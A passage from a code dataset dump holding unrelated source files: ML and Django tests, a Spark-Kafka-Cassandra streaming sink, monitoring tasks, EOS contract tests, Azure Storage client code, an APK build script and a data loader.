pass\n\n compare_saved_model_state_and_current_model_state(model, saved_model_state)\n\n\n@pytest.mark.parametrize('model', [BasicConvTestModel(), TwoConvTestModel(), MockModel(),\n DepthWiseConvTestModel(), EightConvTestModel()])\ndef test_bn_training_state_switcher(_seed, model):\n runner = DataLoaderBNAdaptationRunner(model, 'cuda', 0)\n saved_model_state = {}\n\n def check_were_only_bn_training_state_changed(module, saved_state):\n for ch in module.children():\n if isinstance(ch, (nn.BatchNorm1d,\n nn.BatchNorm2d,\n nn.BatchNorm3d)):\n assert ch.training\n else:\n assert ch.training == saved_state[ch]\n check_were_only_bn_training_state_changed(ch, saved_state)\n\n randomly_change_model_training_state(model)\n\n save_model_training_state(model, saved_model_state)\n\n # pylint: disable=protected-access\n with runner._bn_training_state_switcher():\n check_were_only_bn_training_state_changed(model, saved_model_state)\n\n compare_saved_model_state_and_current_model_state(model, saved_model_state)\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"298728909","text":"import sys\n\nsys.path.append('/'.join(sys.path[0].split('/')[0:-1]))\nsys.path.append('/'.join(sys.path[0].split('/')[0:-2]))\n\nimport a_api\nimport db\n\n#making the account\nx = a_api.make_account({})\n\n#checking the server response\nif x.status_code != 400:\n db.reset()\n raise Exception(\n f\"Account creation w/ no username did not return 400 response, instead returned {x.status_code}\"\n )\n\ndb.reset()","sub_path":"tests/accounts/create_account/create_account_no_payload.py","file_name":"create_account_no_payload.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"441161448","text":"import findspark\nfindspark.init()\nimport pyspark as ps\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer\nfrom confluent_kafka.serialization import SerializationContext\nfrom pyspark.sql.functions import udf, array\nfrom pyspark.sql.types import DoubleType, StringType, ArrayType\nfrom cassandra.cluster import Cluster\nfrom cassandra.auth import PlainTextAuthProvider\n\n\nwindowSize = 5\nslideSize = 3\nwindowDuration = '{} seconds'.format(windowSize)\nslideDuration = '{} seconds'.format(slideSize)\n\n\ndef getSparkInstance():\n \"\"\"\n @return: Return Spark session\n \"\"\"\n spark = ps.sql.SparkSession.builder \\\n .master(\"local[4]\") \\\n .appName(\"individual\") \\\n .getOrCreate()\n return spark\n\n\nspark = getSparkInstance()\n\n\ndef process_row(serialized_data):\n schema = '''\n {\n \"namespace\": \"org.mddarr.rides.event.dto\",\n \"type\": \"record\",\n \"name\": \"AvroRideCoordinate\",\n \"fields\": [\n {\"name\": \"eventime\", \"type\": \"long\"},\n {\"name\": \"latitude\", \"type\": \"double\"},\n {\"name\": \"longitude\", \"type\": \"double\"}\n ]\n }\n '''\n schemaRegistryClient = SchemaRegistryClient({\"url\": \"http://localhost:8081\"})\n avroDeserializer = AvroDeserializer(schema, schemaRegistryClient)\n serializationContext = SerializationContext(\"coordinates\", schema)\n deserialized_row = avroDeserializer(serialized_data, serializationContext)\n print(\"THE DESERIALIZED ROW LOOKS LIKE \" + str(deserialized_row))\n\n return [deserialized_row['latitude'], deserialized_row['longitude'],float(deserialized_row['eventime'])]\n\nstreamingDF = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"coordinates\") \\\n .option('includeTimestamp', 'true') \\\n .load()\n\ndeserialize_row_udf = udf(lambda x: process_row(x), ArrayType(DoubleType()))\ndeserialized_value_dataframe = streamingDF.withColumn('deserialized_value', deserialize_row_udf(\"value\"))\n\ndeserialized_split_df = deserialized_value_dataframe.selectExpr(\"key\",\"timestamp\", \"deserialized_value[0] as lat\",\n \"deserialized_value[1] as lng\", \"deserialized_value[2] as eventime\")\n\n\n# deserialized_value_dataframe = deserialized_value_dataframe.select(['key','timestamp','time','deserialized_value',\n# deserialized_value_dataframe.coordinates[0], deserialized_value_dataframe.coordinates[1],deserialized_value_dataframe.coordinates[2] ])\n# split_df = deserialized_value_dataframe.select(de deserialized_value_dataframe.coordinates[0], deserialized_value_dataframe.coordinates[1],deserialized_value_dataframe.coordinates[2] )\n\n\n\n# deserialized_value_dataframe = deserialized_value_dataframe.withColumnRenamed('coordinates', 'value')\n\n# split_df = df.select(df.name, df.coordinates[0], df.coordinates[1])\n#\n#\n# split_df = df.selectExpr(\"name as name\", \"coordinates[0] as lat\", \"coordinates[1] as lng\")\n\n\n\ndef insert_coordinate_data_cassandra(row):\n\n print(\"THE ROW LOOKS LIKE \" + str(row))\n\n key = row['key'].decode('utf-8')\n\n insert_time_series_data_point = \"\"\"INSERT INTO coordinates(rideid, time, latitude, longitude) VALUES(%s,%s,%s, %s);\"\"\"\n try:\n dbsession = initialize_cassanrdra_session()\n dbsession.set_keyspace('ks1')\n dbsession.execute(insert_time_series_data_point, [key, int(row['eventime']), row['lat'], row['lng']])\n print(\"I EXECUTED THE QUERY\")\n\n except Exception as e:\n print(e)\n print(\"I DID NOT EXECUTE THE QUERY\")\n\n\ndef initialize_cassanrdra_session():\n auth_provider = PlainTextAuthProvider(username='cassandra', password='cassandra')\n try:\n cluster = Cluster([\"127.0.0.1\"], auth_provider=auth_provider)\n session = cluster.connect()\n return session\n except Exception as e:\n print(e)\n return None\n\n\nds = deserialized_split_df \\\n .writeStream \\\n .format(\"console\") \\\n .foreach(insert_coordinate_data_cassandra) \\\n .trigger(processingTime=\"5 seconds\") \\\n .start()\n\n# ds = deserialized_value_dataframe \\\n# .selectExpr(\"value\", \"CAST(key AS STRING)\", \"timestamp\") \\\n# .writeStream \\\n# .foreach(process_row) \\\n# .trigger(processingTime=\"5 seconds\") \\\n# .start()\n\nspark.streams.awaitAnyTermination()\n","sub_path":"structured_streaming/ride_coordinate_sink/cassandra_coordinates_stream_sink.py","file_name":"cassandra_coordinates_stream_sink.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122483263","text":"import asyncio\nimport time\n\nimport config\nimport netboxz\nimport models\nimport memstat\n\n\nlast_temp = 0\n\nasync def check_cluster_temp(app):\n while True:\n Tmax = max(map(netboxz.temp, range(1,4)))\n print('Check temp: Tmax = {}'.format(Tmax))\n\n if Tmax > config.crit_temp and Tmax > last_temp:\n for chat in models.Chat.select().where(models.Chat.user == None):\n app['bot'].send_message(chat.id, \"Oh it's getting hot\")\n last_temp = Tmax\n\n await asyncio.sleep(config.temp_update_time)\n\n\nasync def check_swap_usage(app):\n while True:\n bad_nodes, swap_total, swap_free = memstat.get_nodes_overusing_swap(config.node_list, config.swap_overuse_threshold)\n if len(bad_nodes) > 0:\n message = 'Warning: swap overuse detected on nodes: '\n for i in range(len(bad_nodes)):\n message += '\\n' + bad_nodes[i] + ':\\t'\n message += ' used {0:.1f}G of {1:.1f}G'.format(\n (swap_total[i] - swap_free[i]) / 1048576,\n swap_total[i] / 1048576)\n\n for chat in models.Chat.select().where(models.Chat.user == None):\n app['bot'].send_message(chat.id, message)\n\n await asyncio.sleep(config.mem_update_time)\n","sub_path":"src/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513215723","text":"import os\nimport re\nimport sys\nimport imp\nimport time\nimport struct\n\nimport debug\nimport wallet\nimport eosapi\nimport initeos\nimport traceback\nfrom eosapi import N, mp_compile, pack_bytes, pack_setabi, push_transactions\nfrom common import prepare, producer\n\ndef init(func):\n def func_wrapper(*args, **kwargs):\n prepare('hellolua', 'hello.lua', 'hello.abi', __file__, 10)\n func(*args, **kwargs)\n return func_wrapper\n\n@init\ndef test(name='mike'):\n r = eosapi.push_action('hellolua','sayhello', name, {'hellolua':'active'})\n assert r and not r['except']\n print('cost time:', r['cost'])\n\n# print(eosapi.JsonStruct(r[0]))\n# eosapi.produce_block()\n\n@init\ndef play():\n r = eosapi.push_action('hellolua', 'play', '', {'hellolua':'active'})\n assert r\n\n@init\ndef test2(count=100):\n actions = []\n for i in range(count):\n action = ['hellolua', 'sayhello', str(i), {'hellolua':'active'}]\n actions.append(action)\n\n ret, cost = eosapi.push_actions(actions)\n assert ret and not ret['except']\n print('total cost time:%.3f s, cost per action: %.3f ms, actions per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n@init\ndef tt(count=1000):\n actions = []\n for i in range(count):\n args = {\"from\":'eosio', \"to\":'eosio.ram', \"quantity\":'%.4f EOS'%(0.01,), \"memo\":'hellolua'}\n action = ['eosio.token', 'transfer', args, {'eosio':'active'}]\n actions.append(action)\n\n ret, cost = eosapi.push_actions(actions)\n print(cost)\n print(ret['except'])\n assert ret and not ret['except']\n print('total cost time:%.3f s, cost per action: %.3f ms, actions per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n@init\ndef ttt(count=200):\n actions = []\n for i in range(count):\n args = {\"from\":'eosio', \"to\":'eosio.ram', \"quantity\":'%.4f EOS'%(0.01,), \"memo\":str(i)}\n args = eosapi.pack_args('eosio.token', 'transfer', args)\n action = ['eosio.token', 'transfer', args, [['eosio','active']]]\n actions.append([action])\n\n ret, cost = eosapi.push_transactions(actions)\n\n assert ret\n print('total cost time:%.3f s, cost per action: %.3f ms, transaction per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n\n@init\ndef test3(count=100):\n actions = []\n for i in range(count):\n act = ['hellolua', 'sayhello', b'hello,world%d'%(i,), {'hellolua':'active'}]\n actions.append([act])\n r, cost = eosapi.push_transactions(actions, True)\n print('total cost time:%.3f s, cost per action: %.3f ms, transaction per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n@init\ndef deploy_mpy():\n src_dir = os.path.dirname(os.path.abspath(__file__))\n file_name = 'hello.py'\n \n src_code = eosapi.mp_compile(os.path.join(src_dir, file_name))\n file_name = file_name.replace('.py', '.mpy')\n mod_name = file_name\n msg = int.to_bytes(len(mod_name), 1, 'little')\n msg += mod_name.encode('utf8')\n msg += int.to_bytes(1, 1, 'little') # compiled code\n msg += src_code\n\n print('++++++++++++++++deply:', file_name)\n r = eosapi.push_action('kitties','deploy',msg,{'kitties':'active'})\n assert r\n","sub_path":"programs/pyeos/tests/lua/hello/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"311103311","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def insertIntoMaxTree(self, root: TreeNode, val: int) -> TreeNode:\n newNode = TreeNode(val)\n if val > root.val:\n newNode.left = root\n return newNode\n self.insertHelper(root.right, root, newNode)\n return root\n\n def insertHelper(self, node, parent, newNode):\n if not node:\n parent.right = newNode\n return\n if newNode.val > node.val:\n parent.right = newNode\n newNode.left = node\n return\n self.insertHelper(node.right, node, newNode)\n","sub_path":"src/maximum-binary-tree-ii.py","file_name":"maximum-binary-tree-ii.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"498088074","text":"# Dictionary\n# ==============================\n# Dictionary is a bag of values, each with its own label, whereas List is a linear collection of values\n# that stay in order.\n# Dictionary are like bags - no order. So we index the things we put in the dictionary with a \"lookup tag\".\n\npurse = dict()\npurse['money'] = 12\npurse['candy'] = 3\npurse['tissues'] = 75\nprint(purse) # {'money': 12, 'candy': 3, 'tissues': 75}\nprint(purse['candy']) # 3\npurse['candy'] = purse['candy'] + 2\nprint(purse) # {'money': 12, 'candy': 5, 'tissues': 75}\n\n\n# Comparing Lists and Dictionaries\n# ================================\n# Dictionaries are like lists except that they use keys instead of numbers to look up values.\n\nlst = list()\nlst.append(21)\nlst.append(183)\nprint(lst) # [21, 183]\nlst[0] = 23\nprint(lst) # [23, 183]\n\nddd = dict()\nddd['age'] = 21\nddd['course'] = 182\nprint(ddd) # {'age': 21, 'course': 182}\nddd['age'] = 23\nprint(ddd) # {'age': 23, 'course': 182}\n\n\n# Dictionary Literals (Constants)\n# ================================\n# Dictionary literals use curly braces and have a list of key: value pairs.\n# You can make an empty dictionary using empty curly braces.\n\njjj = {'chuck': 1, 'fred': 42, 'jan': 100}\nprint(jjj) # {'chuck': 1, 'fred': 42, 'jan': 100}\nooo = {}\nprint(ooo) # {}","sub_path":"02. Data Structures/20_Dictionaries.py","file_name":"20_Dictionaries.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"280743414","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nfrom typing import ( # pylint: disable=unused-import\n Union, Optional, Any, Iterable, Dict, List, Type, Tuple,\n TYPE_CHECKING\n)\nimport logging\n\nfrom azure.core.pipeline import AsyncPipeline\nfrom azure.core.exceptions import HttpResponseError\nfrom azure.core.pipeline.policies import (\n ContentDecodePolicy,\n AsyncBearerTokenCredentialPolicy,\n AsyncRedirectPolicy,\n DistributedTracingPolicy\n)\n\nfrom .constants import STORAGE_OAUTH_SCOPE, DEFAULT_SOCKET_TIMEOUT\nfrom .authentication import SharedKeyCredentialPolicy\nfrom .base_client import create_configuration\nfrom .policies import (\n StorageContentValidation,\n StorageRequestHook,\n StorageHosts,\n StorageHeadersPolicy,\n QueueMessagePolicy)\nfrom .policies_async import AsyncStorageResponseHook\n\nfrom .._generated.models import StorageErrorException\nfrom .response_handlers import process_storage_error\n\nif TYPE_CHECKING:\n from azure.core.pipeline import Pipeline\n from azure.core.configuration import Configuration\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AsyncStorageAccountHostsMixin(object):\n\n def __enter__(self):\n raise TypeError(\"Async client only supports 'async with'.\")\n\n def __exit__(self, *args):\n pass\n\n async def __aenter__(self):\n await self._client.__aenter__()\n return self\n\n async def __aexit__(self, *args):\n await self._client.__aexit__(*args)\n\n def _create_pipeline(self, credential, **kwargs):\n # type: (Any, **Any) -> Tuple[Configuration, Pipeline]\n self._credential_policy = None\n if hasattr(credential, 'get_token'):\n self._credential_policy = AsyncBearerTokenCredentialPolicy(credential, STORAGE_OAUTH_SCOPE)\n elif isinstance(credential, SharedKeyCredentialPolicy):\n self._credential_policy = credential\n elif credential is not None:\n raise TypeError(\"Unsupported credential: {}\".format(credential))\n config = kwargs.get('_configuration') or create_configuration(**kwargs)\n if kwargs.get('_pipeline'):\n return config, kwargs['_pipeline']\n config.transport = kwargs.get('transport') # type: ignore\n if 'connection_timeout' not in kwargs:\n kwargs['connection_timeout'] = DEFAULT_SOCKET_TIMEOUT[0] # type: ignore\n if not config.transport:\n try:\n from azure.core.pipeline.transport import AioHttpTransport\n except ImportError:\n raise ImportError(\"Unable to create async transport. Please check aiohttp is installed.\")\n config.transport = AioHttpTransport(**kwargs)\n policies = [\n QueueMessagePolicy(),\n config.headers_policy,\n config.user_agent_policy,\n StorageContentValidation(),\n StorageRequestHook(**kwargs),\n self._credential_policy,\n ContentDecodePolicy(),\n AsyncRedirectPolicy(**kwargs),\n StorageHosts(hosts=self._hosts, **kwargs), # type: ignore\n config.retry_policy,\n config.logging_policy,\n AsyncStorageResponseHook(**kwargs),\n DistributedTracingPolicy(),\n ]\n return config, AsyncPipeline(config.transport, policies=policies)\n\n async def _batch_send(\n self, *reqs # type: HttpRequest\n ):\n \"\"\"Given a series of request, do a Storage batch call.\n \"\"\"\n request = self._client._client.post( # pylint: disable=protected-access\n url='https://{}/?comp=batch'.format(self.primary_hostname),\n headers={\n 'x-ms-version': self._client._config.version # pylint: disable=protected-access\n }\n )\n\n request.set_multipart_mixed(\n *reqs,\n policies=[\n StorageHeadersPolicy(),\n self._credential_policy\n ]\n )\n\n pipeline_response = await self._pipeline.run(\n request,\n )\n response = pipeline_response.http_response\n\n try:\n if response.status_code not in [202]:\n raise HttpResponseError(response=response)\n return response.parts() # Return an AsyncIterator\n except StorageErrorException as error:\n process_storage_error(error)\n","sub_path":"sdk/storage/azure-storage-queue/azure/storage/queue/_shared/base_client_async.py","file_name":"base_client_async.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336963477","text":"import json\n\nfrom rest_framework.test import APITestCase, APIClient\nfrom rest_framework.views import status\n\n\nclass TestReportArticle(APITestCase):\n \"\"\"\n Class tests for rating article.\n \"\"\"\n client = APIClient()\n\n def setUp(self):\n \"\"\" Creates user and article for testing\"\"\"\n self.article = {\n \"title\": \"epic\",\n \"description\": \"sdsd\",\n \"body\": \"dsd\",\n \"images\": \"\"\n }\n self.user = {\n \"user\": {\n \"email\": \"winniekariuki07@gmail.com\",\n \"username\": \"Winnie\",\n \"password\": \"Winnie07\"\n }\n }\n self.user_1 = {\n \"user\": {\n \"email\": \"julietkariuki07@gmail.com\",\n \"username\": \"Juliet\",\n \"password\": \"Juliet07\"\n }\n }\n self.admin = {\n \"user\": {\n \"email\": \"andelaolympians@andela.com\",\n \"username\": \"andela\",\n \"password\": \"Kariuki07\"\n }\n }\n \n self.report = {\n\t \"report_message\":\"plagerism\"\n }\n \n\n create_user = self.client.post(\n '/api/users/', self.user, format='json')\n\n create_user_1 = self.client.post(\n '/api/users/', self.user_1, format='json')\n create_admin = self.client.post(\n '/api/users/', self.admin, format='json')\n \n \n self.request_tkn = self.client.post(\n '/api/users/login/', self.user, format='json')\n token_request = json.loads(self.request_tkn.content)\n self.token = token_request[\"user\"][\"token\"]\n\n self.request_tkn_1= self.client.post(\n '/api/users/login/', self.user_1, format='json')\n token_request_1 = json.loads(self.request_tkn_1.content)\n self.token_1 = token_request_1[\"user\"][\"token\"]\n\n self.request_tkn_admin= self.client.post(\n '/api/users/login/', self.admin, format='json')\n token_request_admin= json.loads(self.request_tkn_admin.content)\n self.token_admin = token_request_admin[\"user\"][\"token\"]\n\n create_profile = self.client.post('/api/profile/create_profile/', self.user,\n HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n\n create_profile = self.client.post('/api/profile/create_profile/', self.user_1,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n\n create_article = self.client.post('/api/articles/', self.article,\n HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n def test_successful_report(self):\n \"\"\"Test reporting of an article \n \n \"\"\"\n from rest_framework.test import APIClient\n client = APIClient()\n response = client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"message\"], \"Your report has been sent successfully to the admin \")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_report_of_article_does_not_exist(self):\n \"\"\"Test reporting of an article that does not exist\n \n \"\"\"\n from rest_framework.test import APIClient\n client = APIClient()\n response = client.post('/api/report/spoon/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"error_message\"], \"The article you are reporting does not exist\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_reporting_your_own_article(self):\n \"\"\"Test reporting your own article\n \n \"\"\"\n \n response = self.client.post('/api/articles/', self.article,\n HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n result = json.loads(response.content)\n \n response = self.client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token,\n format='json')\n result = json.loads(response.content)\n \n self.assertEqual(result[\"errors\"], \"You cannot report your own article\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_report_article_more_than_once(self):\n \"\"\"Test reporting of an article \n \n \"\"\"\n from rest_framework.test import APIClient\n client = APIClient()\n\n response = client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n response = client.post('/api/report/epic/', self.report,\n HTTP_AUTHORIZATION='Token ' + self.token_1,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result['errors'],'You can only report an article once')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n \n def test_get_all_reports(self):\n \"\"\"\n Test getting of all reports\n \n \"\"\" \n from rest_framework.test import APIClient\n client = APIClient()\n \n response = self.client.get('/api/reports/',\n HTTP_AUTHORIZATION='Token ' + self.token_admin,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"message\"], \"You have no permissions\")\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_get_single_report(self):\n \"\"\"\n Test getting of single report\n \n \"\"\" \n from rest_framework.test import APIClient\n client = APIClient()\n \n response = self.client.get('/api/reports/epic/',\n HTTP_AUTHORIZATION='Token ' + self.token_admin,\n format='json')\n result = json.loads(response.content)\n\n self.assertEqual(result[\"message\"], \"You have no permissions\")\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n","sub_path":"authors/apps/article/tests/test_report_article.py","file_name":"test_report_article.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"362455093","text":"\"\"\"Ejercicio 10: Escribir la función comparar(a,b)\r\nque reciba como parámetros dos números enteros y\r\ndevuelva 1 si el primero es mayor que el segundo,\r\n0 si son iguales o -1 si el primero es menor que el segundo.\r\nEjemplo: comparar(4,2) devuelve 1, y comparar(2,4) devuelve -1.\"\"\"\r\n\r\ndef comparar(a,b):\r\n if a>b:\r\n n=\"1\"\r\n else:\r\n if a\n\n\nimport sys\nimport os\nimport os.path\nimport shutil\nimport time\nimport commands\nimport traceback\nimport glob\nimport threading\nimport time\nimport logging\nimport subprocess\nfrom optparse import OptionParser\n\nSCRIPT_PATH = os.path.realpath(__file__)\nConstPath = os.path.dirname(SCRIPT_PATH)\n\nLOG = None\nLOG_LEVEL = logging.DEBUG\nBUILD_TIME = time.strftime('%Y%m%d', time.localtime(time.time()))\nDEFAULT_CMD_TIMEOUT = 1200\n#RES_STDICT = {\"positive\":0,\"negative\":1}\nRESULT_DIR = os.path.join(ConstPath, \"apks\")\nMAX_RUNNING_THREAD_NUM = 12\n\n\nclass ColorFormatter(logging.Formatter):\n\n def __init__(self, msg):\n logging.Formatter.__init__(self, msg)\n\n def format(self, record):\n red, green, yellow, blue = range(4)\n colors = {'INFO': green, 'DEBUG': blue,\n 'WARNING': yellow, 'ERROR': red}\n msg = record.msg\n if msg[0] == \"+\":\n msg = \"\\33[01m\" + msg[1:] + \"\\033[0m\"\n elif msg[0] == \"=\":\n msg = \"\\33[07m\" + msg + \"\\033[0m\"\n levelname = record.levelname\n if levelname in colors:\n msg_color = \"\\033[0;%dm\" % (\n 31 + colors[levelname]) + msg + \"\\033[0m\"\n record.msg = msg_color\n\n return logging.Formatter.format(self, record)\n\n\ndef doCMDWithOutput(cmd, time_out=DEFAULT_CMD_TIMEOUT):\n LOG.info(\"Doing CMD: [ %s ]\" % cmd)\n pre_time = time.time()\n output = []\n cmd_return_code = 1\n cmd_proc = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n\n while True:\n output_line = cmd_proc.stdout.readline().strip(\"\\r\\n\")\n cmd_return_code = cmd_proc.poll()\n elapsed_time = time.time() - pre_time\n if cmd_return_code is None:\n if elapsed_time >= time_out:\n killProcesses(ppid=cmd_proc.pid)\n LOG.error(\"Timeout to exe CMD\")\n return False\n elif output_line == '' and cmd_return_code is not None:\n break\n\n sys.stdout.write(\"%s\\n\" % output_line)\n sys.stdout.flush()\n output.append(output_line)\n if cmd_return_code != 0:\n LOG.error(\"Fail to exe CMD\")\n\n return (cmd_return_code, output)\n\n\ndef init_env(arch_arg):\n\n global RES_FILE\n global RES_ARCH_DIR\n\n RES_ARCH_DIR = os.path.join(RESULT_DIR, arch_arg)\n RES_FILE = os.path.join(RESULT_DIR, arch_arg, \"Pkg_result.txt\")\n\n if os.path.exists(RES_ARCH_DIR):\n shutil.rmtree(RES_ARCH_DIR)\n\n os.makedirs(RES_ARCH_DIR)\n os.mknod(RES_FILE)\n\n\ndef ge_apks(suite_dir, arch_arg, res_arch_dir):\n\n if max_num.acquire():\n\n suite_name = suite_dir.split('/')[-1]\n suitename_without_flag = suite_name.split('-')[0]\n flag = suite_name.split('-')[-1]\n\n cmd = \"python \" + os.path.join(\n BUILD_PARAMETERS.pkgpacktools,\n 'crosswalk',\n 'make_apk.py') + \" --package=org.xwalk.test --app-versionCode=123 --arch=\" + arch_arg + \" --manifest=\"\n manifest_path = os.path.join(suite_dir, \"manifest.json\")\n res_suite_dir = os.path.join(res_arch_dir, suite_name)\n\n if not os.path.exists(manifest_path):\n LOG.error(\"%s not exists !!!\" % manifest_path)\n ores_file.write(\n suitename_without_flag +\n \"\\t\" +\n flag +\n \"\\t\" +\n \"Manifest not exists !!!\" +\n \"\\n\")\n return\n if os.path.exists(res_suite_dir):\n shutil.rmtree(res_suite_dir)\n os.makedirs(res_suite_dir)\n\n os.chdir(res_suite_dir)\n\n status, info = doCMDWithOutput(cmd + manifest_path)\n\n if (status == 0 and flag == 'positive') or (\n status != 0 and flag == 'negative'):\n result = \"PASS\"\n else:\n result = \"FAIL\"\n\n if status != 0:\n shutil.rmtree(res_suite_dir)\n\n ores_file.write(\n suite_name +\n \"\\t\" +\n flag +\n \"\\t\" +\n result +\n \"\\n\")\n\n if result == \"PASS\":\n LOG.info(\n \"Built Done: [ %s %s %s %s ] !!! \" %\n (suitename_without_flag, flag, result, status))\n else:\n LOG.error(\n \"Built Done: [ %s %s %s %s ] !!! \" %\n (suitename_without_flag, flag, result, status))\n\n #if threading.activeCount() >= MAX_RUNNING_THREAD_NUM:\n max_num.release()\n\n\nif __name__ == \"__main__\":\n\n #global LOG\n LOG = logging.getLogger(\"pack-tool\")\n LOG.setLevel(LOG_LEVEL)\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(LOG_LEVEL)\n stream_formatter = ColorFormatter(\"[%(asctime)s] %(message)s\")\n stream_handler.setFormatter(stream_formatter)\n LOG.addHandler(stream_handler)\n pack_threads = []\n global max_num\n global ores_file\n\n try:\n usage = \"Usage: ./gen_apks -a x86 --tools=\"\n opts_parser = OptionParser(usage=usage)\n opts_parser.add_option(\n \"-a\",\n \"--arch\",\n dest=\"pkgarch\",\n help=\"specify the apk arch, e.g. x86, arm\")\n opts_parser.add_option(\n \"--tools\",\n dest=\"pkgpacktools\",\n help=\"specify the parent folder of pack tools\")\n\n if len(sys.argv) == 1:\n sys.argv.append(\"-h\")\n\n global BUILD_PARAMETERS\n (BUILD_PARAMETERS, args) = opts_parser.parse_args()\n except Exception as e:\n LOG.error(\"Got wrong options: %s, exit ...\" % e)\n sys.exit(1)\n\n if not BUILD_PARAMETERS.pkgarch:\n BUILD_PARAMETERS.pkgarch = \"x86\"\n\n if not BUILD_PARAMETERS.pkgpacktools:\n BUILD_PARAMETERS.pkgpacktools = os.path.join(\n ConstPath, \"..\", \"..\", \"tools\")\n BUILD_PARAMETERS.pkgpacktools = os.path.expanduser(\n BUILD_PARAMETERS.pkgpacktools)\n\n init_env(BUILD_PARAMETERS.pkgarch)\n\n ores_file = open(RES_FILE, 'w')\n\n max_num = threading.Semaphore(MAX_RUNNING_THREAD_NUM)\n for suite in os.listdir(os.path.join(ConstPath, 'tcs')):\n suite_abspath = os.path.join(ConstPath, 'tcs', suite)\n pack_threads.append(\n threading.Thread(\n target=ge_apks,\n args=(\n suite_abspath,\n BUILD_PARAMETERS.pkgarch,\n RES_ARCH_DIR)))\n\n for sthread in pack_threads:\n # if max_num.acquire():\n #sthread.daemon = True\n time.sleep(2)\n sthread.start()\n # if len(threading.enumerate()) < 3:\n # max_num.release()\n\n for sthread in pack_threads:\n sthread.join()\n\n ores_file.flush()\n ores_file.close()\n","sub_path":"wrt/wrt-manifest-android-tests/gen_apks.py","file_name":"gen_apks.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"271113799","text":"import pandas as pd\nimport numpy as np\n\nMNLI_PATH = \"/home/ndg/users/jkurre/mnli/utils/multinli_1.0_dev_mismatched.jsonl\"\nGLOVE_PATH = \"/home/ndg/users/jkurre/mnli/utils/embeddings/glove.6B.50d.txt\"\nLABEL_TO_INT = {'contradiction':1, 'entailment':2, 'neutral':3}\n\ndef load_mnli():\n # read data to pandas dataframe \n mnli_data = pd.read_json(MNLI_PATH, lines=True)\n # combine pairs and map labels to ids\n mnli_data[\"sentence\"] = mnli_data[\"sentence1\"] + \"\" + mnli_data[\"sentence2\"]\n mnli_data[\"gold_label\"] = mnli_data[\"gold_label\"].apply(lambda label: LABEL_TO_INT[label])\n # split data into train, validation, and test set\n train, validate, test = np.split(\n mnli_data.sample(frac=1), [int(.6*len(mnli_data)),int(.8*len(mnli_data))]\n )\n # export to csv and return train, validation, and test set\n train.to_csv(\"train.csv\")\n validate.to_csv(\"val.csv\")\n test.to_csv(\"test.csv\")\n return train, validate, test\n\ndef load_glove(vocabulary):\n \"\"\"\n Wikipedia 2014 + Gigaword 5 vectors\n https://nlp.stanford.edu/projects/glove/\n \"\"\"\n embeddings = {}\n \n with open(GLOVE_PATH, 'r', encoding=\"utf-8\") as f:\n for line in f:\n values = 